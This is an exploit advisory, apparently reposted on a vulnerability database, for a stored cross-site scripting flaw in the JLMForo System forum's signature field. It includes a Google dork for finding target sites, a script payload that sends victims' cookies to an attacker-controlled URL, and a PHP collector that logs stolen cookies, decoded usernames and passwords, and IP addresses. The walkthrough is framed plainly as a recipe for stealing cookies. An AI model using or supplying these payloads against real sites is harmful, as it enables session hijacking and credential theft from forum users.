JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

2007.12.16
Credit: JosS
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability # Download: # http://www.miscodigos.com/aplicaciones/JLMForo%20System/ # Bug found by Jose Luis Gngora Fernndez / JosS # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Powered By JLMForo System" # Stop lammer # Explanation Basic : 1.- Register in the forum (registro.php) 2.- Put in your signature the XSS (modificarPerfil.php) 3.- Create a subject 4.- Wait to an answer to visualize the XSS # To Rob Cookies: 1?- Register in the forum (registro.php) 2?- Put in your signature the XSS (modificarPerfil.php): <script>window.location=?http://yousite.com/xss.php?cookie=?+document.co okie</script> 3?- Upload in your Site: <?php $archivo = fopen('log2.htm','a');//Aqu podemos cambiar el nombre del archivo a crear $cookie = $_GET['c']; $usuario = $_GET['id']; $ip = getenv ('REMOTE_ADDR'); $re = $HTTPREFERRER; $fecha=date("j F, Y, g:i a"); fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>'); fclose($archivo); ?> 4?- Chmod 777 archive 5?- Create a subject 6?- Wait to an answer to run the XSS //---------------------------------------\ Greetz To: All Hackers Jose Luis Gngora Fernndez / JosS!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top